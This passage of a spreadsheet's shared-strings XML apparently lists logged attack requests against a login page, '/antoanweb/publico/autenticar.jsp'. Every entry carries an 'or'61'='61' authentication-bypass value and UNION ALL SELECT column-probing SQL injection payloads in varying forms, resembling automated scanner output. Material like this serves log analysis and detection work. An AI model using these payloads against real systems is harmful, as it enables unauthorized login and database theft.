    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect8735,8735,8735,8735,8735,8735,8735,8735,8735,8735,8735,8735,8735,8735,8735,8735,8735,8735,8735,8735,8735,8735,8735,8735,8735,8735,8735,8735,8735,8735,8735,8735,8735,8735,8735,8735,8735,8735,8735,8735,8735,8735,8735,8735,8735,8735,8735,8735,8735,8735--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect3736,3736,3736,3736,3736,3736,3736,3736,3736,3736,3736,3736,3736,3736,3736,3736,3736,3736,3736,3736,3736,3736,3736,3736,3736,3736,3736,3736,3736,3736,3736,3736,3736,3736,3736,3736,3736,3736,3736,3736,3736--and('wytv'='wytv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect6558,6558,6558,6558,6558,6558,6558,6558,6558,6558,6558,6558,6558,6558,6558,6558,6558,6558,6558,6558,6558,6558,6558,6558,6558,6558,6558,6558,6558,6558,6558,6558,6558,6558,6558,6558,6558,6558,6558,6558,6558,6558--and('ehgz'='ehgz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect4568,4568,4568,4568,4568,4568,4568,4568,4568,4568,4568,4568,4568,4568,4568,4568,4568,4568,4568,4568,4568,4568,4568,4568,4568,4568,4568,4568,4568,4568,4568,4568,4568,4568,4568,4568,4568,4568,4568,4568,4568,4568,4568--and('shxm'='shxm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect4999,4999,4999,4999,4999,4999,4999,4999,4999,4999,4999,4999,4999,4999,4999,4999,4999,4999,4999,4999,4999,4999,4999,4999,4999,4999,4999,4999,4999,4999,4999,4999,4999,4999,4999,4999,4999,4999,4999,4999,4999,4999,4999,4999--and('jxqu'='jxqu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect6014,6014,6014,6014,6014,6014,6014,6014,6014,6014,6014,6014,6014,6014,6014,6014,6014,6014,6014,6014,6014,6014,6014,6014,6014,6014,6014,6014,6014,6014,6014,6014,6014,6014,6014,6014,6014,6014,6014,6014,6014,6014,6014,6014,6014--and('afqi'='afqi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect3087,3087,3087,3087,3087,3087,3087,3087,3087,3087,3087,3087,3087,3087,3087,3087,3087,3087,3087,3087,3087,3087,3087,3087,3087,3087,3087,3087,3087,3087,3087,3087,3087,3087,3087,3087,3087,3087,3087,3087,3087,3087,3087,3087,3087,3087--and('bpny'='bpny</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263,6263--and('fxpq'='fxpq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect8573,8573,8573,8573,8573,8573,8573,8573,8573,8573,8573,8573,8573,8573,8573,8573,8573,8573,8573,8573,8573,8573,8573,8573,8573,8573,8573,8573,8573,8573,8573,8573,8573,8573,8573,8573,8573,8573,8573,8573,8573,8573,8573,8573,8573,8573,8573,8573--and('tado'='tado</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect441,441,441,441,441,441,441,441,441,441,441,441,441,441,441,441,441,441,441,441,441,441,441,441,441,441,441,441,441,441,441,441,441,441,441,441,441,441,441,441,441,441,441,441,441,441,441,441,441--and('qfjl'='qfjl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect2166,2166,2166,2166,2166,2166,2166,2166,2166,2166,2166,2166,2166,2166,2166,2166,2166,2166,2166,2166,2166,2166,2166,2166,2166,2166,2166,2166,2166,2166,2166,2166,2166,2166,2166,2166,2166,2166,2166,2166,2166,2166,2166,2166,2166,2166,2166,2166,2166,2166--and('gyrd'='gyrd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect481,481,481,481,481,481,481,481,481,481,481,481,481,481,481,481,481,481,481,481,481,481,481,481,481,481,481,481,481,481,481,481,481,481,481,481,481,481,481,481,481--and(('abpg'='abpg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect2523,2523,2523,2523,2523,2523,2523,2523,2523,2523,2523,2523,2523,2523,2523,2523,2523,2523,2523,2523,2523,2523,2523,2523,2523,2523,2523,2523,2523,2523,2523,2523,2523,2523,2523,2523,2523,2523,2523,2523,2523,2523--and(('kmmi'='kmmi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect9341,9341,9341,9341,9341,9341,9341,9341,9341,9341,9341,9341,9341,9341,9341,9341,9341,9341,9341,9341,9341,9341,9341,9341,9341,9341,9341,9341,9341,9341,9341,9341,9341,9341,9341,9341,9341,9341,9341,9341,9341,9341,9341--and(('ohkl'='ohkl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811,7811--and(('lkzd'='lkzd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect5252,5252,5252,5252,5252,5252,5252,5252,5252,5252,5252,5252,5252,5252,5252,5252,5252,5252,5252,5252,5252,5252,5252,5252,5252,5252,5252,5252,5252,5252,5252,5252,5252,5252,5252,5252,5252,5252,5252,5252,5252,5252,5252,5252,5252--and(('avfu'='avfu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435,4435--and(('qsye'='qsye</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect1709,1709,1709,1709,1709,1709,1709,1709,1709,1709,1709,1709,1709,1709,1709,1709,1709,1709,1709,1709,1709,1709,1709,1709,1709,1709,1709,1709,1709,1709,1709,1709,1709,1709,1709,1709,1709,1709,1709,1709,1709,1709,1709,1709,1709,1709,1709--and(('ahoj'='ahoj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect1191,1191,1191,1191,1191,1191,1191,1191,1191,1191,1191,1191,1191,1191,1191,1191,1191,1191,1191,1191,1191,1191,1191,1191,1191,1191,1191,1191,1191,1191,1191,1191,1191,1191,1191,1191,1191,1191,1191,1191,1191,1191,1191,1191,1191,1191,1191,1191--and(('fzxs'='fzxs</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect7242,7242,7242,7242,7242,7242,7242,7242,7242,7242,7242,7242,7242,7242,7242,7242,7242,7242,7242,7242,7242,7242,7242,7242,7242,7242,7242,7242,7242,7242,7242,7242,7242,7242,7242,7242,7242,7242,7242,7242,7242,7242,7242,7242,7242,7242,7242,7242,7242--and(('btjx'='btjx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect963,963,963,963,963,963,963,963,963,963,963,963,963,963,963,963,963,963,963,963,963,963,963,963,963,963,963,963,963,963,963,963,963,963,963,963,963,963,963,963,963,963,963,963,963,963,963,963,963,963--and(('mjzd'='mjzd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect7314,7314,7314,7314,7314,7314,7314,7314,7314,7314,7314,7314,7314,7314,7314,7314,7314,7314,7314,7314,7314,7314,7314,7314,7314,7314,7314,7314,7314,7314,7314,7314,7314,7314,7314,7314,7314,7314,7314,7314,7314--and((('aeev'='aeev</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect2397,2397,2397,2397,2397,2397,2397,2397,2397,2397,2397,2397,2397,2397,2397,2397,2397,2397,2397,2397,2397,2397,2397,2397,2397,2397,2397,2397,2397,2397,2397,2397,2397,2397,2397,2397,2397,2397,2397,2397,2397,2397--and((('cwqp'='cwqp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect6614,6614,6614,6614,6614,6614,6614,6614,6614,6614,6614,6614,6614,6614,6614,6614,6614,6614,6614,6614,6614,6614,6614,6614,6614,6614,6614,6614,6614,6614,6614,6614,6614,6614,6614,6614,6614,6614,6614,6614,6614,6614,6614--and((('ywkj'='ywkj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect8342,8342,8342,8342,8342,8342,8342,8342,8342,8342,8342,8342,8342,8342,8342,8342,8342,8342,8342,8342,8342,8342,8342,8342,8342,8342,8342,8342,8342,8342,8342,8342,8342,8342,8342,8342,8342,8342,8342,8342,8342,8342,8342,8342--and((('pudx'='pudx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect2704,2704,2704,2704,2704,2704,2704,2704,2704,2704,2704,2704,2704,2704,2704,2704,2704,2704,2704,2704,2704,2704,2704,2704,2704,2704,2704,2704,2704,2704,2704,2704,2704,2704,2704,2704,2704,2704,2704,2704,2704,2704,2704,2704,2704--and((('bcbn'='bcbn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977,9977--and((('bqqn'='bqqn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect2809,2809,2809,2809,2809,2809,2809,2809,2809,2809,2809,2809,2809,2809,2809,2809,2809,2809,2809,2809,2809,2809,2809,2809,2809,2809,2809,2809,2809,2809,2809,2809,2809,2809,2809,2809,2809,2809,2809,2809,2809,2809,2809,2809,2809,2809,2809--and((('layf'='layf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752,5752--and((('mhfg'='mhfg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156--and((('pbap'='pbap</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect6768,6768,6768,6768,6768,6768,6768,6768,6768,6768,6768,6768,6768,6768,6768,6768,6768,6768,6768,6768,6768,6768,6768,6768,6768,6768,6768,6768,6768,6768,6768,6768,6768,6768,6768,6768,6768,6768,6768,6768,6768,6768,6768,6768,6768,6768,6768,6768,6768,6768--and((('bnlu'='bnlu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect1677,1677,1677,1677,1677,1677,1677,1677,1677,1677,1677,1677,1677,1677,1677,1677,1677,1677,1677,1677,1677,1677,1677,1677,1677,1677,1677,1677,1677,1677,1677,1677,1677,1677,1677,1677,1677,1677,1677,1677,1677--and'bnju'='bnju</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect332,332,332,332,332,332,332,332,332,332,332,332,332,332,332,332,332,332,332,332,332,332,332,332,332,332,332,332,332,332,332,332,332,332,332,332,332,332,332,332,332,332--and'jorx'='jorx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect8638,8638,8638,8638,8638,8638,8638,8638,8638,8638,8638,8638,8638,8638,8638,8638,8638,8638,8638,8638,8638,8638,8638,8638,8638,8638,8638,8638,8638,8638,8638,8638,8638,8638,8638,8638,8638,8638,8638,8638,8638,8638,8638--and'rgxa'='rgxa</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect7191,7191,7191,7191,7191,7191,7191,7191,7191,7191,7191,7191,7191,7191,7191,7191,7191,7191,7191,7191,7191,7191,7191,7191,7191,7191,7191,7191,7191,7191,7191,7191,7191,7191,7191,7191,7191,7191,7191,7191,7191,7191,7191,7191--and'emyo'='emyo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71--and'jcuy'='jcuy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect6082,6082,6082,6082,6082,6082,6082,6082,6082,6082,6082,6082,6082,6082,6082,6082,6082,6082,6082,6082,6082,6082,6082,6082,6082,6082,6082,6082,6082,6082,6082,6082,6082,6082,6082,6082,6082,6082,6082,6082,6082,6082,6082,6082,6082,6082--and'igsj'='igsj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128,2128--and'reij'='reij</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect2034,2034,2034,2034,2034,2034,2034,2034,2034,2034,2034,2034,2034,2034,2034,2034,2034,2034,2034,2034,2034,2034,2034,2034,2034,2034,2034,2034,2034,2034,2034,2034,2034,2034,2034,2034,2034,2034,2034,2034,2034,2034,2034,2034,2034,2034,2034,2034--and'jfsw'='jfsw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204,6204--and'vaus'='vaus</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect2598,2598,2598,2598,2598,2598,2598,2598,2598,2598,2598,2598,2598,2598,2598,2598,2598,2598,2598,2598,2598,2598,2598,2598,2598,2598,2598,2598,2598,2598,2598,2598,2598,2598,2598,2598,2598,2598,2598,2598,2598,2598,2598,2598,2598,2598,2598,2598,2598,2598--and'ounw'='ounw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect8522,8522,8522,8522,8522,8522,8522,8522,8522,8522,8522,8522,8522,8522,8522,8522,8522,8522,8522,8522,8522,8522,8522,8522,8522,8522,8522,8522,8522,8522,8522,8522,8522,8522,8522,8522,8522,8522,8522,8522,8522--and('rvrk'like'rvrk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect8062,8062,8062,8062,8062,8062,8062,8062,8062,8062,8062,8062,8062,8062,8062,8062,8062,8062,8062,8062,8062,8062,8062,8062,8062,8062,8062,8062,8062,8062,8062,8062,8062,8062,8062,8062,8062,8062,8062,8062,8062,8062--and('thfv'like'thfv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect9902,9902,9902,9902,9902,9902,9902,9902,9902,9902,9902,9902,9902,9902,9902,9902,9902,9902,9902,9902,9902,9902,9902,9902,9902,9902,9902,9902,9902,9902,9902,9902,9902,9902,9902,9902,9902,9902,9902,9902,9902,9902,9902--and('ldno'like'ldno</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect4883,4883,4883,4883,4883,4883,4883,4883,4883,4883,4883,4883,4883,4883,4883,4883,4883,4883,4883,4883,4883,4883,4883,4883,4883,4883,4883,4883,4883,4883,4883,4883,4883,4883,4883,4883,4883,4883,4883,4883,4883,4883,4883,4883--and('ldjs'like'ldjs</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853--and('exjh'like'exjh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect537,537,537,537,537,537,537,537,537,537,537,537,537,537,537,537,537,537,537,537,537,537,537,537,537,537,537,537,537,537,537,537,537,537,537,537,537,537,537,537,537,537,537,537,537,537--and('jdfz'like'jdfz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect8630,8630,8630,8630,8630,8630,8630,8630,8630,8630,8630,8630,8630,8630,8630,8630,8630,8630,8630,8630,8630,8630,8630,8630,8630,8630,8630,8630,8630,8630,8630,8630,8630,8630,8630,8630,8630,8630,8630,8630,8630,8630,8630,8630,8630,8630,8630--and('amyq'like'amyq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect8687,8687,8687,8687,8687,8687,8687,8687,8687,8687,8687,8687,8687,8687,8687,8687,8687,8687,8687,8687,8687,8687,8687,8687,8687,8687,8687,8687,8687,8687,8687,8687,8687,8687,8687,8687,8687,8687,8687,8687,8687,8687,8687,8687,8687,8687,8687,8687--and('exoq'like'exoq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect3616,3616,3616,3616,3616,3616,3616,3616,3616,3616,3616,3616,3616,3616,3616,3616,3616,3616,3616,3616,3616,3616,3616,3616,3616,3616,3616,3616,3616,3616,3616,3616,3616,3616,3616,3616,3616,3616,3616,3616,3616,3616,3616,3616,3616,3616,3616,3616,3616--and('yoyh'like'yoyh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect9153,9153,9153,9153,9153,9153,9153,9153,9153,9153,9153,9153,9153,9153,9153,9153,9153,9153,9153,9153,9153,9153,9153,9153,9153,9153,9153,9153,9153,9153,9153,9153,9153,9153,9153,9153,9153,9153,9153,9153,9153,9153,9153,9153,9153,9153,9153,9153,9153,9153--and('ekhq'like'ekhq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect1065,1065,1065,1065,1065,1065,1065,1065,1065,1065,1065,1065,1065,1065,1065,1065,1065,1065,1065,1065,1065,1065,1065,1065,1065,1065,1065,1065,1065,1065,1065,1065,1065,1065,1065,1065,1065,1065,1065,1065,1065--and(('lfkj'like'lfkj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect2265,2265,2265,2265,2265,2265,2265,2265,2265,2265,2265,2265,2265,2265,2265,2265,2265,2265,2265,2265,2265,2265,2265,2265,2265,2265,2265,2265,2265,2265,2265,2265,2265,2265,2265,2265,2265,2265,2265,2265,2265,2265--and(('jbzj'like'jbzj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758,9758--and(('pzvu'like'pzvu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect8854,8854,8854,8854,8854,8854,8854,8854,8854,8854,8854,8854,8854,8854,8854,8854,8854,8854,8854,8854,8854,8854,8854,8854,8854,8854,8854,8854,8854,8854,8854,8854,8854,8854,8854,8854,8854,8854,8854,8854,8854,8854,8854,8854--and(('loeb'like'loeb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect7661,7661,7661,7661,7661,7661,7661,7661,7661,7661,7661,7661,7661,7661,7661,7661,7661,7661,7661,7661,7661,7661,7661,7661,7661,7661,7661,7661,7661,7661,7661,7661,7661,7661,7661,7661,7661,7661,7661,7661,7661,7661,7661,7661,7661--and(('gerk'like'gerk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413--and(('bdbu'like'bdbu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect4642,4642,4642,4642,4642,4642,4642,4642,4642,4642,4642,4642,4642,4642,4642,4642,4642,4642,4642,4642,4642,4642,4642,4642,4642,4642,4642,4642,4642,4642,4642,4642,4642,4642,4642,4642,4642,4642,4642,4642,4642,4642,4642,4642,4642,4642,4642--and(('nmbp'like'nmbp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect370,370,370,370,370,370,370,370,370,370,370,370,370,370,370,370,370,370,370,370,370,370,370,370,370,370,370,370,370,370,370,370,370,370,370,370,370,370,370,370,370,370,370,370,370,370,370,370--and(('ktym'like'ktym</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect2282,2282,2282,2282,2282,2282,2282,2282,2282,2282,2282,2282,2282,2282,2282,2282,2282,2282,2282,2282,2282,2282,2282,2282,2282,2282,2282,2282,2282,2282,2282,2282,2282,2282,2282,2282,2282,2282,2282,2282,2282,2282,2282,2282,2282,2282,2282,2282,2282--and(('ryeu'like'ryeu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766,6766--and(('tucl'like'tucl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect6514,6514,6514,6514,6514,6514,6514,6514,6514,6514,6514,6514,6514,6514,6514,6514,6514,6514,6514,6514,6514,6514,6514,6514,6514,6514,6514,6514,6514,6514,6514,6514,6514,6514,6514,6514,6514,6514,6514,6514,6514--and((('pjml'like'pjml</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect7206,7206,7206,7206,7206,7206,7206,7206,7206,7206,7206,7206,7206,7206,7206,7206,7206,7206,7206,7206,7206,7206,7206,7206,7206,7206,7206,7206,7206,7206,7206,7206,7206,7206,7206,7206,7206,7206,7206,7206,7206,7206--and((('wslr'like'wslr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect1856,1856,1856,1856,1856,1856,1856,1856,1856,1856,1856,1856,1856,1856,1856,1856,1856,1856,1856,1856,1856,1856,1856,1856,1856,1856,1856,1856,1856,1856,1856,1856,1856,1856,1856,1856,1856,1856,1856,1856,1856,1856,1856--and((('cfki'like'cfki</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect1843,1843,1843,1843,1843,1843,1843,1843,1843,1843,1843,1843,1843,1843,1843,1843,1843,1843,1843,1843,1843,1843,1843,1843,1843,1843,1843,1843,1843,1843,1843,1843,1843,1843,1843,1843,1843,1843,1843,1843,1843,1843,1843,1843--and((('qxuh'like'qxuh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271,3271--and((('puri'like'puri</t>
  </si>
  <si>
